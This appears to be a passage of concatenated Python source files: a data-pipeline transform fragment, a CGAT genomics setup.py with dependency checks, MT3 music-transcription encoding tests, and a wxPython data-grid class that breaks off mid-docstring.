desired_bundle_size: the desired size of data ranges that should be
generated when splitting a file into data ranges.
min_bundle_size: minimum size of data ranges that should be generated when
splitting a file into data ranges.
source_from_file: a function that produces a ``BoundedSource`` given a
file name. System will use this function to generate
``BoundedSource`` objects for file paths. Note that file
paths passed to this will be for individual files, not
for file patterns even if the ``PCollection`` of files
processed by the transform consist of file patterns.
"""
self._splittable = splittable
self._compression_type = compression_type
self._desired_bundle_size = desired_bundle_size
self._min_bundle_size = min_bundle_size
self._source_from_file = source_from_file
def expand(self, pvalue):
return (pvalue
| 'ExpandIntoRanges' >> ParDo(_ExpandIntoRanges(
self._splittable, self._compression_type,
self._desired_bundle_size, self._min_bundle_size))
| 'Reshard' >> Reshuffle()
| 'ReadRange' >> ParDo(_ReadRange(self._source_from_file)))
|
|
import glob
import sys
import os
import subprocess
import re
########################################################################
#######################################################################
# Check for dependencies
#
# Is there a way to do this more elegantly?
# 1. Run "pip install numpy"
# 2. Wrap inside functions (works for numpy/pysam, but not cython)
try:
import numpy
except ImportError:
raise ImportError(
"the CGAT code collection requires numpy to be installed "
"before running setup.py (pip install numpy)")
try:
import Cython
except ImportError:
raise ImportError(
"the CGAT code collection requires cython to "
"be installed before running setup.py (pip install cython)")
try:
import pysam
except ImportError:
raise ImportError(
"the CGAT code collection requires pysam to "
"be installed before running setup.py (pip install pysam)")
########################################################################
########################################################################
# Import setuptools
# Use existing setuptools, otherwise try ez_setup.
try:
import setuptools
except ImportError:
# try to get via ez_setup
# ez_setup did not work on all machines tested as
# it uses curl with https protocol, which is not
# enabled in ScientificLinux
import ez_setup
ez_setup.use_setuptools()
from setuptools import setup, find_packages, Extension
from distutils.version import LooseVersion
if LooseVersion(setuptools.__version__) < LooseVersion('1.1'):
print(("Version detected:", LooseVersion(setuptools.__version__)))
raise ImportError(
"the CGAT code collection requires setuptools 1.1 higher")
from Cython.Distutils import build_ext
########################################################################
########################################################################
IS_OSX = sys.platform == 'darwin'
########################################################################
########################################################################
# collect CGAT version
sys.path.insert(0, "scripts")
import version
version = version.__version__
###############################################################
###############################################################
# Check for external dependencies
#
# Not exhaustive, simply execute a representative tool from a toolkit.
external_dependencies = (
("wigToBigWig", "UCSC tools", 255),
("bedtools", "bedtools", 0),
)
for tool, toolkit, expected in external_dependencies:
try:
# py3k
from subprocess import DEVNULL
except ImportError:
DEVNULL = open(os.devnull, 'wb')
try:
retcode = subprocess.call(tool, shell=True,
stdout=DEVNULL, stderr=DEVNULL)
except OSError as msg:
print(("WARNING: depency check for %s failed: %s" % (toolkit, msg)))
# UCSC tools return 255 when called without arguments
if retcode != expected:
print(("WARNING: depency check for %s(%s) failed, error %i" %
(toolkit, tool, retcode)))
###############################################################
###############################################################
# Define dependencies
#
# Perform a CGAT Code Collection Installation
INSTALL_CGAT_CODE_COLLECTION = True
major, minor1, minor2, s, tmp = sys.version_info
if (major == 2 and minor1 < 7) or major < 2:
raise SystemExit("""CGAT requires Python 2.7 or later.""")
#####################################################################
#####################################################################
# Code to install dependencies from a repository
#####################################################################
# Modified from http://stackoverflow.com/a/9125399
#####################################################################
def which(program):
"""
Detect whether or not a program is installed.
Thanks to http://stackoverflow.com/a/377028/70191
"""
def is_exe(fpath):
return os.path.exists(fpath) and os.access(fpath, os.X_OK)
fpath, _ = os.path.split(program)
if fpath:
if is_exe(program):
return program
else:
for path in os.environ['PATH'].split(os.pathsep):
exe_file = os.path.join(path, program)
if is_exe(exe_file):
return exe_file
return None
REPO_REQUIREMENT = re.compile(
r'^-e (?P<link>(?P<vcs>git|svn|hg|bzr).+#egg=(?P<package>.+)-(?P<version>\d(?:\.\d)*))$')
HTTPS_REQUIREMENT = re.compile(
r'^-e (?P<link>.*).+#(?P<package>.+)-(?P<version>\d(?:\.\d)*)$')
install_requires = []
dependency_links = []
for requirement in (
l.strip() for l in open('requires.txt') if not l.startswith("#")):
match = REPO_REQUIREMENT.match(requirement)
if match:
assert which(match.group('vcs')) is not None, \
("VCS '%(vcs)s' must be installed in order to "
"install %(link)s" % match.groupdict())
install_requires.append("%(package)s==%(version)s" % match.groupdict())
dependency_links.append(match.group('link'))
continue
if requirement.startswith("https"):
install_requires.append(requirement)
continue
match = HTTPS_REQUIREMENT.match(requirement)
if match:
install_requires.append("%(package)s>=%(version)s" % match.groupdict())
dependency_links.append(match.group('link'))
continue
install_requires.append(requirement)
if major == 2:
install_requires.extend(['web.py>=0.37',
'xlwt>=0.7.4',
'matplotlib-venn>=0.5'])
elif major == 3:
pass
if INSTALL_CGAT_CODE_COLLECTION:
cgat_packages = find_packages(exclude=["CGATPipelines*", "scripts*"])
else:
cgat_packages = find_packages(exclude=["scripts*"])
# rename scripts to CGATScripts
cgat_packages.append("CGATScripts")
cgat_package_dirs = {'CGAT': 'CGAT',
'CGATScripts': 'scripts',
'CGATPipelines': 'CGATPipelines'}
##########################################################
##########################################################
# Classifiers
classifiers = """
Development Status :: 3 - Alpha
Intended Audience :: Science/Research
Intended Audience :: Developers
License :: OSI Approved
Programming Language :: Python
Topic :: Software Development
Topic :: Scientific/Engineering
Operating System :: POSIX
Operating System :: Unix
Operating System :: MacOS
"""
setup(
# package information
name='CGATPipelines',
version=version,
description='CGAT : the Computational Genomics Analysis Toolkit',
author='Andreas Heger',
author_email='andreas.heger@gmail.com',
license="MIT",
platforms=["any"],
keywords="computational genomics",
long_description='CGAT : the Computational Genomics Analysis Toolkit',
classifiers=[_f for _f in classifiers.split("\n") if _f],
url="http://www.cgat.org/cgat/Tools/",
# package contents
packages=cgat_packages,
package_dir=cgat_package_dirs,
include_package_data=True,
entry_points={
'console_scripts': ['cgatflow = CGATPipelines.cgatflow:main']
},
# dependencies
install_requires=install_requires,
dependency_links=dependency_links,
# extension modules
ext_modules=[],
cmdclass={'build_ext': build_ext},
# other options
zip_safe=False,
test_suite="tests",
)
|
|
# Copyright 2022 The MT3 Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for note_sequences."""
from mt3 import event_codec
from mt3 import note_sequences
from mt3 import run_length_encoding
import note_seq
import numpy as np
import tensorflow as tf
codec = event_codec.Codec(
max_shift_steps=100,
steps_per_second=100,
event_ranges=[
event_codec.EventRange('pitch', note_seq.MIN_MIDI_PITCH,
note_seq.MAX_MIDI_PITCH),
event_codec.EventRange('velocity', 0, 127),
event_codec.EventRange('drum', note_seq.MIN_MIDI_PITCH,
note_seq.MAX_MIDI_PITCH),
event_codec.EventRange('program', note_seq.MIN_MIDI_PROGRAM,
note_seq.MAX_MIDI_PROGRAM),
event_codec.EventRange('tie', 0, 0)
])
class RunLengthEncodingTest(tf.test.TestCase):
def test_encode_and_index_note_sequence(self):
ns = note_seq.NoteSequence()
ns.notes.add(start_time=1.0,
end_time=1.1,
pitch=61,
velocity=100)
ns.notes.add(start_time=2.0,
end_time=2.1,
pitch=62,
velocity=100)
ns.notes.add(start_time=3.0,
end_time=3.1,
pitch=63,
velocity=100)
ns.total_time = ns.notes[-1].end_time
frame_times = np.arange(0, 4, step=.001)
event_times, event_values = note_sequences.note_sequence_to_onsets(ns)
events, event_start_indices, event_end_indices, _, _ = run_length_encoding.encode_and_index_events(
state=None, event_times=event_times, event_values=event_values,
encode_event_fn=note_sequences.note_event_data_to_events,
codec=codec, frame_times=frame_times)
self.assertEqual(len(frame_times), len(event_start_indices))
self.assertEqual(len(frame_times), len(event_end_indices))
self.assertLen(events, 403)
expected_events = ([1] * 100 +
[162] +
[1] * 100 +
[163] +
[1] * 100 +
[164] +
[1] * 100)
np.testing.assert_array_equal(expected_events, events)
self.assertEqual(event_start_indices[0], 0)
self.assertEqual(event_end_indices[0], 0)
self.assertEqual(162, events[100])
self.assertEqual(1.0, frame_times[1000])
self.assertEqual(event_start_indices[1000], 100)
self.assertEqual(event_end_indices[1000], 100)
self.assertEqual(163, events[201])
self.assertEqual(2.0, frame_times[2000])
self.assertEqual(event_start_indices[2000], 201)
self.assertEqual(event_end_indices[2000], 201)
self.assertEqual(164, events[302])
self.assertEqual(3.0, frame_times[3000])
self.assertEqual(event_start_indices[3000], 302)
self.assertEqual(event_end_indices[3000], 302)
self.assertEqual(1, events[-1])
self.assertEqual(3.999, frame_times[-1])
self.assertEqual(event_start_indices[-1], 402)
self.assertEqual(event_end_indices[-1], len(expected_events))
def test_encode_and_index_note_sequence_velocity(self):
ns = note_seq.NoteSequence()
ns.notes.add(start_time=1.0,
end_time=3.0,
pitch=61,
velocity=1)
ns.notes.add(start_time=2.0,
end_time=4.0,
pitch=62,
velocity=127)
ns.total_time = ns.notes[-1].end_time
frame_times = np.arange(0, 4, step=.001)
event_times, event_values = (
note_sequences.note_sequence_to_onsets_and_offsets(ns))
events, event_start_indices, event_end_indices, _, _ = run_length_encoding.encode_and_index_events(
state=None, event_times=event_times, event_values=event_values,
encode_event_fn=note_sequences.note_event_data_to_events,
codec=codec, frame_times=frame_times)
self.assertEqual(len(frame_times), len(event_start_indices))
self.assertEqual(len(frame_times), len(event_end_indices))
self.assertLen(events, 408)
expected_events = ([1] * 100 +
[230, 162] +
[1] * 100 +
[356, 163] +
[1] * 100 +
[229, 162] +
[1] * 100 +
[229, 163])
np.testing.assert_array_equal(expected_events, events)
self.assertEqual(event_start_indices[0], 0)
self.assertEqual(event_end_indices[0], 0)
self.assertEqual(230, events[100])
self.assertEqual(162, events[101])
self.assertEqual(1.0, frame_times[1000])
self.assertEqual(event_start_indices[1000], 100)
self.assertEqual(event_end_indices[1000], 100)
self.assertEqual(356, events[202])
self.assertEqual(163, events[203])
self.assertEqual(2.0, frame_times[2000])
self.assertEqual(event_start_indices[2000], 202)
self.assertEqual(event_end_indices[2000], 202)
self.assertEqual(229, events[304])
self.assertEqual(162, events[305])
self.assertEqual(3.0, frame_times[3000])
self.assertEqual(event_start_indices[3000], 304)
self.assertEqual(event_end_indices[3000], 304)
self.assertEqual(229, events[406])
self.assertEqual(163, events[407])
self.assertEqual(3.999, frame_times[-1])
self.assertEqual(event_start_indices[-1], 405)
self.assertEqual(event_end_indices[-1], len(expected_events))
def test_encode_and_index_note_sequence_multitrack(self):
ns = note_seq.NoteSequence()
ns.notes.add(start_time=0.0,
end_time=1.0,
pitch=37,
velocity=127,
is_drum=True)
ns.notes.add(start_time=1.0,
end_time=3.0,
pitch=61,
velocity=127,
program=0)
ns.notes.add(start_time=2.0,
end_time=4.0,
pitch=62,
velocity=127,
program=40)
ns.total_time = ns.notes[-1].end_time
frame_times = np.arange(0, 4, step=.001)
event_times, event_values = (
note_sequences.note_sequence_to_onsets_and_offsets_and_programs(ns))
(tokens, event_start_indices, event_end_indices, state_tokens,
state_event_indices) = run_length_encoding.encode_and_index_events(
state=note_sequences.NoteEncodingState(),
event_times=event_times, event_values=event_values,
encode_event_fn=note_sequences.note_event_data_to_events,
codec=codec, frame_times=frame_times,
encoding_state_to_events_fn=(
note_sequences.note_encoding_state_to_events))
self.assertEqual(len(frame_times), len(event_start_indices))
self.assertEqual(len(frame_times), len(event_end_indices))
self.assertEqual(len(frame_times), len(state_event_indices))
self.assertLen(tokens, 414)
expected_events = (
[event_codec.Event('velocity', 127), event_codec.Event('drum', 37)] +
[event_codec.Event('shift', 1)] * 100 +
[event_codec.Event('program', 0),
event_codec.Event('velocity', 127), event_codec.Event('pitch', 61)] +
[event_codec.Event('shift', 1)] * 100 +
[event_codec.Event('program', 40),
event_codec.Event('velocity', 127), event_codec.Event('pitch', 62)] +
[event_codec.Event('shift', 1)] * 100 +
[event_codec.Event('program', 0),
event_codec.Event('velocity', 0), event_codec.Event('pitch', 61)] +
[event_codec.Event('shift', 1)] * 100 +
[event_codec.Event('program', 40),
event_codec.Event('velocity', 0), event_codec.Event('pitch', 62)])
expected_tokens = [codec.encode_event(e) for e in expected_events]
np.testing.assert_array_equal(expected_tokens, tokens)
expected_state_events = [
event_codec.Event('tie', 0), # state prior to first drum
event_codec.Event('tie', 0), # state prior to first onset
event_codec.Event('program', 0), # state prior to second onset
event_codec.Event('pitch', 61), # |
event_codec.Event('tie', 0), # |
event_codec.Event('program', 0), # state prior to first offset
event_codec.Event('pitch', 61), # |
event_codec.Event('program', 40), # |
event_codec.Event('pitch', 62), # |
event_codec.Event('tie', 0), # |
event_codec.Event('program', 40), # state prior to second offset
event_codec.Event('pitch', 62), # |
event_codec.Event('tie', 0) # |
]
expected_state_tokens = [codec.encode_event(e)
for e in expected_state_events]
np.testing.assert_array_equal(expected_state_tokens, state_tokens)
self.assertEqual(event_start_indices[0], 0)
self.assertEqual(event_end_indices[0], 0)
self.assertEqual(state_event_indices[0], 0)
self.assertEqual(1.0, frame_times[1000])
self.assertEqual(event_start_indices[1000], 102)
self.assertEqual(event_end_indices[1000], 102)
self.assertEqual(state_event_indices[1000], 1)
self.assertEqual(2.0, frame_times[2000])
self.assertEqual(event_start_indices[2000], 205)
self.assertEqual(event_end_indices[2000], 205)
self.assertEqual(state_event_indices[2000], 2)
self.assertEqual(3.0, frame_times[3000])
self.assertEqual(event_start_indices[3000], 308)
self.assertEqual(event_end_indices[3000], 308)
self.assertEqual(state_event_indices[3000], 5)
self.assertEqual(3.999, frame_times[-1])
self.assertEqual(event_start_indices[-1], 410)
self.assertEqual(event_end_indices[-1], len(expected_events))
self.assertEqual(state_event_indices[-1], 10)
def test_encode_and_index_note_sequence_last_token_alignment(self):
ns = note_seq.NoteSequence()
ns.notes.add(start_time=0.0,
end_time=0.1,
pitch=60,
velocity=100)
ns.total_time = ns.notes[-1].end_time
frame_times = np.arange(0, 1.008, step=.008)
event_times, event_values = note_sequences.note_sequence_to_onsets(ns)
events, event_start_indices, event_end_indices, _, _ = run_length_encoding.encode_and_index_events(
state=None,
event_times=event_times,
event_values=event_values,
encode_event_fn=note_sequences.note_event_data_to_events,
codec=codec,
frame_times=frame_times)
self.assertEqual(len(frame_times), len(event_start_indices))
self.assertEqual(len(frame_times), len(event_end_indices))
self.assertLen(events, 102)
expected_events = [161] + [1] * 101
np.testing.assert_array_equal(expected_events, events)
self.assertEqual(event_start_indices[0], 0)
self.assertEqual(event_end_indices[0], 0)
self.assertEqual(event_start_indices[125], 101)
self.assertEqual(event_end_indices[125], 102)
def test_decode_note_sequence_events(self):
events = [25, 161, 50, 162]
decoding_state = note_sequences.NoteDecodingState()
invalid_ids, dropped_events = run_length_encoding.decode_events(
state=decoding_state, tokens=events, start_time=0, max_time=None,
codec=codec, decode_event_fn=note_sequences.decode_note_onset_event)
ns = note_sequences.flush_note_decoding_state(decoding_state)
self.assertEqual(0, invalid_ids)
self.assertEqual(0, dropped_events)
expected_ns = note_seq.NoteSequence(ticks_per_quarter=220)
expected_ns.notes.add(
pitch=60,
velocity=100,
start_time=0.25,
end_time=0.26)
expected_ns.notes.add(
pitch=61,
velocity=100,
start_time=0.50,
end_time=0.51)
expected_ns.total_time = 0.51
self.assertProtoEquals(expected_ns, ns)
def test_decode_note_sequence_events_onsets_only(self):
events = [5, 161, 25, 162]
decoding_state = note_sequences.NoteDecodingState()
invalid_ids, dropped_events = run_length_encoding.decode_events(
state=decoding_state, tokens=events, start_time=0, max_time=None,
codec=codec, decode_event_fn=note_sequences.decode_note_onset_event)
ns = note_sequences.flush_note_decoding_state(decoding_state)
self.assertEqual(0, invalid_ids)
self.assertEqual(0, dropped_events)
expected_ns = note_seq.NoteSequence(ticks_per_quarter=220)
expected_ns.notes.add(
pitch=60,
velocity=100,
start_time=0.05,
end_time=0.06)
expected_ns.notes.add(
pitch=61,
velocity=100,
start_time=0.25,
end_time=0.26)
expected_ns.total_time = 0.26
self.assertProtoEquals(expected_ns, ns)
def test_decode_note_sequence_events_velocity(self):
events = [5, 356, 161, 25, 229, 161]
decoding_state = note_sequences.NoteDecodingState()
invalid_ids, dropped_events = run_length_encoding.decode_events(
state=decoding_state, tokens=events, start_time=0, max_time=None,
codec=codec, decode_event_fn=note_sequences.decode_note_event)
ns = note_sequences.flush_note_decoding_state(decoding_state)
self.assertEqual(0, invalid_ids)
self.assertEqual(0, dropped_events)
expected_ns = note_seq.NoteSequence(ticks_per_quarter=220)
expected_ns.notes.add(
pitch=60,
velocity=127,
start_time=0.05,
end_time=0.25)
expected_ns.total_time = 0.25
self.assertProtoEquals(expected_ns, ns)
def test_decode_note_sequence_events_missing_offset(self):
events = [5, 356, 161, 10, 161, 25, 229, 161]
decoding_state = note_sequences.NoteDecodingState()
invalid_ids, dropped_events = run_length_encoding.decode_events(
state=decoding_state, tokens=events, start_time=0, max_time=None,
codec=codec, decode_event_fn=note_sequences.decode_note_event)
ns = note_sequences.flush_note_decoding_state(decoding_state)
self.assertEqual(0, invalid_ids)
self.assertEqual(0, dropped_events)
expected_ns = note_seq.NoteSequence(ticks_per_quarter=220)
expected_ns.notes.add(
pitch=60,
velocity=127,
start_time=0.05,
end_time=0.10)
expected_ns.notes.add(
pitch=60,
velocity=127,
start_time=0.10,
end_time=0.25)
expected_ns.total_time = 0.25
self.assertProtoEquals(expected_ns, ns)
def test_decode_note_sequence_events_multitrack(self):
events = [5, 525, 356, 161, 15, 356, 394, 25, 525, 229, 161]
decoding_state = note_sequences.NoteDecodingState()
invalid_ids, dropped_events = run_length_encoding.decode_events(
state=decoding_state, tokens=events, start_time=0, max_time=None,
codec=codec, decode_event_fn=note_sequences.decode_note_event)
ns = note_sequences.flush_note_decoding_state(decoding_state)
self.assertEqual(0, invalid_ids)
self.assertEqual(0, dropped_events)
expected_ns = note_seq.NoteSequence(ticks_per_quarter=220)
expected_ns.notes.add(
pitch=37,
velocity=127,
start_time=0.15,
end_time=0.16,
instrument=9,
is_drum=True)
expected_ns.notes.add(
pitch=60,
velocity=127,
start_time=0.05,
end_time=0.25,
program=40)
expected_ns.total_time = 0.25
self.assertProtoEquals(expected_ns, ns)
def test_decode_note_sequence_events_invalid_tokens(self):
events = [5, -1, 161, -2, 25, 162, 9999]
decoding_state = note_sequences.NoteDecodingState()
invalid_events, dropped_events = run_length_encoding.decode_events(
state=decoding_state, tokens=events, start_time=0, max_time=None,
codec=codec, decode_event_fn=note_sequences.decode_note_onset_event)
ns = note_sequences.flush_note_decoding_state(decoding_state)
self.assertEqual(3, invalid_events)
self.assertEqual(0, dropped_events)
expected_ns = note_seq.NoteSequence(ticks_per_quarter=220)
expected_ns.notes.add(
pitch=60,
velocity=100,
start_time=0.05,
end_time=0.06)
expected_ns.notes.add(
pitch=61,
velocity=100,
start_time=0.25,
end_time=0.26)
expected_ns.total_time = 0.26
self.assertProtoEquals(expected_ns, ns)
def test_decode_note_sequence_events_allow_event_at_exactly_max_time(self):
events = [161, 25, 162]
decoding_state = note_sequences.NoteDecodingState()
invalid_ids, dropped_events = run_length_encoding.decode_events(
state=decoding_state, tokens=events, start_time=1.0, max_time=1.25,
codec=codec, decode_event_fn=note_sequences.decode_note_onset_event)
ns = note_sequences.flush_note_decoding_state(decoding_state)
self.assertEqual(0, invalid_ids)
self.assertEqual(0, dropped_events)
expected_ns = note_seq.NoteSequence(ticks_per_quarter=220)
expected_ns.notes.add(
pitch=60,
velocity=100,
start_time=1.00,
end_time=1.01)
expected_ns.notes.add(
pitch=61,
velocity=100,
start_time=1.25,
end_time=1.26)
expected_ns.total_time = 1.26
self.assertProtoEquals(expected_ns, ns)
def test_decode_note_sequence_events_dropped_events(self):
events = [5, 161, 30, 162]
decoding_state = note_sequences.NoteDecodingState()
invalid_ids, dropped_events = run_length_encoding.decode_events(
state=decoding_state, tokens=events, start_time=1.0, max_time=1.25,
codec=codec, decode_event_fn=note_sequences.decode_note_onset_event)
ns = note_sequences.flush_note_decoding_state(decoding_state)
self.assertEqual(0, invalid_ids)
self.assertEqual(2, dropped_events)
expected_ns = note_seq.NoteSequence(ticks_per_quarter=220)
expected_ns.notes.add(
pitch=60,
velocity=100,
start_time=1.05,
end_time=1.06)
expected_ns.total_time = 1.06
self.assertProtoEquals(expected_ns, ns)
def test_decode_note_sequence_events_invalid_events(self):
events = [25, 230, 50, 161]
decoding_state = note_sequences.NoteDecodingState()
invalid_ids, dropped_events = run_length_encoding.decode_events(
state=decoding_state, tokens=events, start_time=0, max_time=None,
codec=codec, decode_event_fn=note_sequences.decode_note_onset_event)
ns = note_sequences.flush_note_decoding_state(decoding_state)
self.assertEqual(1, invalid_ids)
self.assertEqual(0, dropped_events)
expected_ns = note_seq.NoteSequence(ticks_per_quarter=220)
expected_ns.notes.add(
pitch=60,
velocity=100,
start_time=0.50,
end_time=0.51)
expected_ns.total_time = 0.51
self.assertProtoEquals(expected_ns, ns)
if __name__ == '__main__':
tf.test.main()
|
|
#import matplotlib
#matplotlib.use('WXAgg')
import sys
import numpy as np
import pandas as pd
import wx
import wx.grid as gridlib
import wx.lib.mixins.gridlabelrenderer as gridlabelrenderer
class HugeTable(gridlib.GridTableBase):
"""
Table class for virtual grid
"""
def __init__(self, log, num_rows, num_cols):
gridlib.GridTableBase.__init__(self)
self.log = log
self.odd=gridlib.GridCellAttr()
#self.odd.SetBackgroundColour("sky blue")
self.even=gridlib.GridCellAttr()
#self.even.SetBackgroundColour("sea green")
self.num_rows = num_rows
self.num_cols = num_cols
self.dataframe = []
def GetAttr(self, row, col, kind):
attr = [self.even, self.odd][row % 2]
attr.IncRef()
return attr
def GetNumberRows(self):
return self.num_rows
def GetNumberCols(self):
return self.num_cols
def IsEmptyCell(self, row, col):
return False
def GetValue(self, row, col):
"""
Find the matching value from pandas DataFrame,
return it.
"""
if len(self.dataframe):
return str(self.dataframe.iloc[row, col])
return ''
def SetValue(self, row, col, value):
"""
Set value in the pandas DataFrame
"""
self.dataframe.iloc[row, col] = value
def SetColumnValues(self, col, value):
"""
Custom method to efficiently set all values
in a column.
Parameters
----------
col : str or int
name or index position of column
value : list-like
values to assign to all cells in the column
"""
try:
self.dataframe.iloc[:, col] = value
except ValueError:
self.dataframe.loc[:, col] = value
def GetColLabelValue(self, col):
"""
Get col label from dataframe
"""
if len(self.dataframe):
return self.dataframe.columns[col]
return ''
def SetColLabelValue(self, col, value):
"""
Set col label value in dataframe
"""
if len(self.dataframe):
col_name = str(self.dataframe.columns[col])
self.dataframe.rename(columns={col_name: str(value)}, inplace=True)
return None
def AppendCols(self, *args):
self.num_cols += 1
msg = gridlib.GridTableMessage(self, # The table
gridlib.GRIDTABLE_NOTIFY_COLS_APPENDED, # what we did to it
1) # how many
self.GetView().ProcessTableMessage(msg)
return True
# this currently fails with segfault
def DeleteCols(self, pos, numCols, updateLabels=True):
self.num_cols -= 1
grid = self.GetView()
grid.BeginBatch()
msg = gridlib.GridTableMessage(self,
gridlib.GRIDTABLE_NOTIFY_COLS_DELETED,
numCols)
grid.ProcessTableMessage(msg)
grid.EndBatch()
return True
class BaseMagicGrid(gridlib.Grid, gridlabelrenderer.GridWithLabelRenderersMixin):
"""
grid class
"""
def __init__(self, parent, name, row_labels, col_labels, size=0):
self.name = name
self.changes = None
self.row_labels = sorted(row_labels)
self.col_labels = col_labels
if not size:
super(BaseMagicGrid, self).__init__(parent, -1, name=name)
if size:
super(BaseMagicGrid, self).__init__(parent, -1, name=name, size=size)
gridlabelrenderer.GridWithLabelRenderersMixin.__init__(self)
### the next few lines may prove unnecessary
ancestry = ['specimen', 'sample', 'site', 'location', None]
if name == 'age':
self.parent_type = None
else:
try:
self.parent_type = ancestry[ancestry.index(name) + 1]
except ValueError:
self.parent_type = None
###
#self.InitUI()
def InitUI(self):
pass
def set_scrollbars(self):
"""
Set to always have vertical scrollbar.
Have horizontal scrollbar unless grid has very few rows.
Older versions of wxPython will choke on this,
in which case nothing happens.
"""
try:
if len(self.row_labels) < 5:
show_horizontal = wx.SHOW_SB_NEVER
else:
show_horizontal = wx.SHOW_SB_DEFAULT
self.ShowScrollbars(show_horizontal, wx.SHOW_SB_DEFAULT)
except AttributeError:
pass
def add_items(self, dataframe, hide_cols=()):
"""
Add items and/or update existing items in grid
"""
# replace "None" values with ""
dataframe = dataframe.fillna("")
# remove any columns that shouldn't be shown
for col in hide_cols:
if col in dataframe.columns:
del dataframe[col]
# add more rows
self.AppendRows(len(dataframe))
columns = dataframe.columns
row_num = -1
# fill in all rows with appropriate values
for ind, row in dataframe.iterrows():
row_num += 1
for col_num, col in enumerate(columns):
value = row[col]
self.SetCellValue(row_num, col_num, str(value))
# set citation default value
if col == 'citations':
citation = row['citations']
if (citation is None) or (citation is np.nan):
self.SetCellValue(row_num, col_num, 'This study')
else:
if 'This study' not in citation:
if len(citation):
citation += ':'
citation += 'This study'
self.SetCellValue(row_num, col_num, citation)
self.row_labels.extend(dataframe.index)
def save_items(self, rows=None, verbose=False):
"""
Return a dictionary of row data for selected rows:
{1: {col1: val1, col2: val2}, ...}
If a list of row numbers isn't provided, get data for all.
"""
if rows:
rows = rows
else:
rows = list(range(self.GetNumberRows()))
cols = list(range(self.GetNumberCols()))
data = {}
for row in rows:
data[row] = {}
for col in cols:
col_name = self.GetColLabelValue(col)
if verbose:
print(col_name, ":", self.GetCellValue(row, col))
data[row][col_name] = self.GetCellValue(row, col)
return data
def size_grid(self, event=None):
self.AutoSizeColumns(True)
for col in range(len(self.col_labels)):
# adjust column widths to be a little larger then auto for nicer editing
orig_size = self.GetColSize(col)
if orig_size > 110:
size = orig_size * 1.1
else:
size = orig_size * 1.6
self.SetColSize(col, size)
self.ForceRefresh()
def do_event_bindings(self):
self.Bind(gridlib.EVT_GRID_EDITOR_CREATED, self.on_edit_grid)
self.Bind(gridlib.EVT_GRID_EDITOR_SHOWN, self.on_edit_grid)
self.Bind(wx.EVT_KEY_DOWN, self.on_key_down)
#self.Bind(wx.EVT_TEXT, self.on_key_down_in_editor)
#self.Bind(wx.EVT_CHAR, self.on_key_down)
self.Bind(wx.EVT_TEXT_PASTE, self.on_paste_in_editor)
def on_edit_grid(self, event):
"""sets self.changes to true when user edits the grid.
provides down and up key functionality for exiting the editor"""
if not self.changes:
self.changes = {event.Row}
else:
self.changes.add(event.Row)
#self.changes = True
try:
editor = event.GetControl()
editor.Bind(wx.EVT_KEY_DOWN, self.onEditorKey)
except AttributeError:
# if it's a EVT_GRID_EDITOR_SHOWN, it doesn't have the GetControl method
pass
def onEditorKey(self, event):
keycode = event.GetKeyCode()
if keycode == wx.WXK_UP:
self.MoveCursorUp(False)
self.MoveCursorDown(False)# have this in because otherwise cursor moves up 2 rows
elif keycode == wx.WXK_DOWN:
self.MoveCursorDown(False)
self.MoveCursorUp(False) # have this in because otherwise cursor moves down 2 rows
#elif keycode == wx.WXK_LEFT:
# grid.MoveCursorLeft(False)
#elif keycode == wx.WXK_RIGHT:
# grid.MoveCursorRight(False)
else:
pass
event.Skip()
def on_key_down(self, event):
keycode = event.GetKeyCode()
meta_down = event.MetaDown() or event.CmdDown()
if keycode == 86 and meta_down:
# treat it as if it were a wx.EVT_TEXT_SIZE
paste_event = wx.CommandEvent(wx.wxEVT_COMMAND_TEXT_PASTE,
self.GetId())
self.GetEventHandler().ProcessEvent(paste_event)
else:
event.Skip()
def on_paste_in_editor(self, event):
self.do_paste(event)
def do_paste(self, event):
"""
Read clipboard into dataframe
Paste data into grid, adding extra rows if needed
and ignoring extra columns.
"""
# find where the user has clicked
col_ind = self.GetGridCursorCol()
row_ind = self.GetGridCursorRow()
# read in clipboard text
text_df = pd.read_clipboard(header=None, sep='\t').fillna('')
# add extra rows if need to accomadate clipboard text
row_length_diff = len(text_df) - (len(self.row_labels) - row_ind)
if row_length_diff > 0:
for n in range(row_length_diff):
self.add_row()
# ignore excess columns if present
col_length_diff = len(text_df.columns) - (len(self.col_labels) - col_ind)
if col_length_diff > 0:
text_df = text_df.iloc[:, :-col_length_diff].copy()
# go through copied text and parse it into the grid rows
for label, row_data in text_df.iterrows():
col_range = list(range(col_ind, col_ind + len(row_data)))
if len(row_data) > 1:
cols = list(zip(col_range, row_data.index))
for column in cols:
value = row_data[column[1]]
this_col = column[0]
self.SetCellValue(row_ind, this_col, str(value))
else:
value = row_data[0]
self.SetCellValue(row_ind, col_ind, str(value))
row_ind += 1
# could instead use wxPython clipboard here
# see old git history for that
self.size_grid()
event.Skip()
def add_row(self, label=""):
"""
Add a row to the grid
"""
self.AppendRows(1)
last_row = self.GetNumberRows() - 1
self.SetCellValue(last_row, 0, str(label))
self.row_labels.append(label)
def remove_row(self, row_num=None):
"""
Remove a row from the grid
"""
if not row_num and row_num != 0:
row_num = self.GetNumberRows() - 1
label = self.GetCellValue(row_num, 0)
self.DeleteRows(pos=row_num, numRows=1, updateLabels=True)
# remove label from row_labels
self.row_labels.pop(row_num)
if not self.changes:
self.changes = set()
self.changes.add(-1)
# fix #s for rows edited:
self.update_changes_after_row_delete(row_num)
def update_changes_after_row_delete(self, row_num):
"""
Update self.changes so that row numbers for edited rows are still correct.
I.e., if row 4 was edited and then row 2 was deleted, row 4 becomes row 3.
This function updates self.changes to reflect that.
"""
if row_num in self.changes.copy():
self.changes.remove(row_num)
updated_rows = []
for changed_row in self.changes:
if changed_row == -1:
updated_rows.append(-1)
if changed_row > row_num:
updated_rows.append(changed_row - 1)
if changed_row < row_num:
updated_rows.append(changed_row)
self.changes = set(updated_rows)
def remove_col(self, col_num):
"""
Remove a column from the grid.
Resize grid to display correctly.
"""
label_value = self.GetColLabelValue(col_num).strip('**').strip('^^')
self.col_labels.remove(label_value)
result = self.DeleteCols(pos=col_num, numCols=1, updateLabels=True)
self.size_grid()
return result
### Grid methods ###
"""
def onMouseOver(self, event, grid):
"
Displays a tooltip over any cell in a certain column
